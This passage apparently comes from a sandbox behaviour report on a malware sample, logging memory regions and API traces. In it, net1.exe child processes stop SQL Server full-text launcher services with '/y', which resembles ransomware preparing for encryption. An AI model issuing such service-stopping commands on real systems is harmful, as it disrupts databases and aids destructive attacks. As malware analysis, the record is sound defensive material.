0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 8388 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8389 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8498 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8499 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8500 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8501 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 8502 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 8503 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8504 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8505 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 8506 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 8507 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 8508 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 8509 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8510 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8511 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8512 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8513 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8514 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8515 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8516 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8517 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 668 os_tid = 0xc28 Process: id = "213" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5ce0f000" os_pid = "0x9a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "206" os_parent_pid = "0xc68" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8390 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8391 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8392 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8393 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 8394 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8395 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8396 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8397 start_va = 0xff4c0000 end_va = 0xff4f2fff entry_point = 0xff4c0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 8398 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8399 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8400 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 8401 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8402 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 8403 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8404 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8444 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8445 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8446 start_va = 0x130000 end_va = 0x196fff entry_point = 0x130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8447 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 8448 start_va = 0x420000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 8449 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8450 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8451 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 8452 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 8453 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 8454 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8455 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8456 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8457 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 8458 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 8459 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 8460 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8461 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8462 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8463 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8464 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8465 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8466 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8467 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 670 os_tid = 0x920 [0105.944] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f8d0 | out: lpSystemTimeAsFileTime=0x12f8d0*(dwLowDateTime=0xf44cdad0, dwHighDateTime=0x1d48689)) [0105.944] GetCurrentProcessId () returned 0x9a0 [0105.944] GetCurrentThreadId () returned 0x920 [0105.944] GetTickCount () returned 0x243a4 [0105.944] QueryPerformanceCounter (in: lpPerformanceCount=0x12f8d8 | out: lpPerformanceCount=0x12f8d8*=1815286200000) returned 1 [0105.946] GetModuleHandleW (lpModuleName=0x0) returned 0xff4c0000 [0105.946] __set_app_type (_Type=0x1) [0105.946] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff4d9c9c) returned 0x0 [0105.946] __getmainargs (in: _Argc=0xff4e4780, _Argv=0xff4e4790, _Env=0xff4e4788, _DoWildCard=0, _StartInfo=0xff4e479c | out: _Argc=0xff4e4780, _Argv=0xff4e4790, _Env=0xff4e4788) returned 0 [0105.946] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0105.946] GetConsoleOutputCP () returned 0x1b5 [0105.946] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff4ecec0 | out: lpCPInfo=0xff4ecec0) returned 1 [0105.947] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0105.949] sprintf_s (in: _DstBuf=0x12f878, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0105.949] setlocale (category=0, locale=".437") returned="English_United States.437" [0105.951] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0105.951] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0105.951] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SQL_2008 /y" [0105.951] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12f610, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0105.951] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0105.951] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12f868 | out: Buffer=0x12f868*=0x33c0f0) returned 0x0 [0105.951] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12f868 | out: Buffer=0x12f868*=0x33c110) returned 0x0 [0105.951] _fileno (_File=0x7fefdba2a80) returned 0 [0105.951] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0105.952] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0105.952] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0105.952] _wcsicmp (_String1="config", _String2="stop") returned -16 [0105.952] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0105.952] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0105.952] _wcsicmp (_String1="file", _String2="stop") returned -13 [0105.952] _wcsicmp (_String1="files", _String2="stop") returned -13 [0105.952] _wcsicmp (_String1="group", _String2="stop") returned -12 [0105.952] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0105.952] _wcsicmp (_String1="help", _String2="stop") returned -11 [0105.952] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0105.952] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0105.952] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0105.952] _wcsicmp (_String1="session", _String2="stop") returned -15 [0105.952] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0105.952] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0105.952] _wcsicmp (_String1="share", _String2="stop") returned -12 [0105.952] _wcsicmp (_String1="start", _String2="stop") returned -14 [0105.952] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0105.952] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0105.952] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0105.952] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher$SQL_2008") returned -12 [0105.952] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher$SQL_2008") returned -10 [0105.952] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher$SQL_2008") returned -10 [0105.953] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher$SQL_2008") returned -10 [0105.953] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher$SQL_2008") returned -10 [0105.953] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher$SQL_2008") returned -7 [0105.953] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher$SQL_2008") returned -7 [0105.953] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher$SQL_2008") returned -6 [0105.953] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher$SQL_2008") returned -6 [0105.953] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher$SQL_2008") returned -5 [0105.953] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher$SQL_2008") returned -5 [0105.953] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher$SQL_2008") returned -1 [0105.953] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher$SQL_2008") returned 3 [0105.953] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0105.953] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0105.953] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0105.953] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0105.953] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0105.953] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0105.953] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0105.953] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0105.953] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher$SQL_2008") returned 7 [0105.953] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher$SQL_2008") returned 8 [0105.953] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher$SQL_2008") returned 8 [0105.953] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher$SQL_2008") returned -12 [0105.953] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher$SQL_2008") returned -14 [0105.953] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher$SQL_2008") returned 5 [0105.953] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher$SQL_2008") returned 5 [0105.953] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher$SQL_2008") returned 1 [0105.953] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher$SQL_2008") returned 5 [0105.953] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher$SQL_2008") returned 5 [0105.953] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher$SQL_2008") returned 5 [0105.953] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher$SQL_2008") returned 10 [0105.953] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher$SQL_2008") returned 10 [0105.953] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher$SQL_2008") returned 10 [0105.954] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher$SQL_2008") returned 3 [0105.954] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher$SQL_2008") returned -9 [0105.954] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher$SQL_2008") returned -1 [0105.954] _wcsicmp (_String1="server", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0105.954] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0105.954] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher$SQL_2008") returned 6 [0105.954] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher$SQL_2008") returned -1 [0105.954] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher$SQL_2008") returned -12 [0105.954] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher$SQL_2008") returned 1 [0106.064] _wcsupr (in: _String="MSSQLFDLauncher$SQL_2008" | out: _String="MSSQLFDLAUNCHER$SQL_2008") returned="MSSQLFDLAUNCHER$SQL_2008" [0106.064] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x33ce20 [0106.068] GetServiceKeyNameW (in: hSCManager=0x33ce20, lpDisplayName="MSSQLFDLAUNCHER$SQL_2008", lpServiceName=0xff4e5750, lpcchBuffer=0x12f788 | out: lpServiceName="", lpcchBuffer=0x12f788) returned 0 [0106.069] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER$SQL_2008") returned -12 [0106.069] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER$SQL_2008") returned -14 [0106.069] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 5 [0106.069] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 5 [0106.069] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 5 [0106.069] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 5 [0106.069] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 5 [0106.069] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 10 [0106.069] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 10 [0106.069] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 10 [0106.069] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 3 [0106.069] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER$SQL_2008") returned -9 [0106.069] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER$SQL_2008") returned -1 [0106.069] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 6 [0106.069] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 6 [0106.069] _wcsicmp (_String1="srv", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 6 [0106.069] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER$SQL_2008") returned -1 [0106.069] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER$SQL_2008") returned -12 [0106.069] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER$SQL_2008") returned 1 [0106.069] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER$SQL_2008", opcode=0x0, arg=0x0, bufptr=0x12f790 | out: bufptr=0x12f790) returned 0x889 [0106.070] wcscpy_s (in: _Destination=0xff4e80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0106.070] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0106.071] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff4e5b50, nSize=0x800, Arguments=0xff4e7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0106.072] GetFileType (hFile=0xb) returned 0x2 [0106.072] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f658 | out: lpMode=0x12f658) returned 1 [0106.073] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4e5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x12f650, lpReserved=0x0 | out: lpBuffer=0xff4e5b50*, lpNumberOfCharsWritten=0x12f650*=0x1e) returned 1 [0106.073] GetFileType (hFile=0xb) returned 0x2 [0106.073] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f658 | out: lpMode=0x12f658) returned 1 [0106.073] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f650, lpReserved=0x0 | out: lpBuffer=0xff4c1efc*, lpNumberOfCharsWritten=0x12f650*=0x2) returned 1 [0106.073] _ultow (in: _Dest=0x889, _Radix=1242816 | out: _Dest=0x889) returned="2185" [0106.073] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff4e5b50, nSize=0x800, Arguments=0xff4e7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0106.073] GetFileType (hFile=0xb) returned 0x2 [0106.074] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f658 | out: lpMode=0x12f658) returned 1 [0106.074] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4e5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x12f650, lpReserved=0x0 | out: lpBuffer=0xff4e5b50*, lpNumberOfCharsWritten=0x12f650*=0x34) returned 1 [0106.074] GetFileType (hFile=0xb) returned 0x2 [0106.074] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12f658 | out: lpMode=0x12f658) returned 1 [0106.074] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4c1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f650, lpReserved=0x0 | out: lpBuffer=0xff4c1efc*, lpNumberOfCharsWritten=0x12f650*=0x2) returned 1 [0106.075] NetApiBufferFree (Buffer=0x33c0f0) returned 0x0 [0106.075] NetApiBufferFree (Buffer=0x33c110) returned 0x0 [0106.075] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SQL_2008 /y" [0106.075] exit (_Code=2) Process: id = "214" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5d214000" os_pid = "0xb18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "204" os_parent_pid = "0x8ec" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SHAREPOINT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8405 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8406 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8407 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8408 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 8409 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8410 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8411 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8412 start_va = 0xff4c0000 end_va = 0xff4f2fff entry_point = 0xff4c0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: 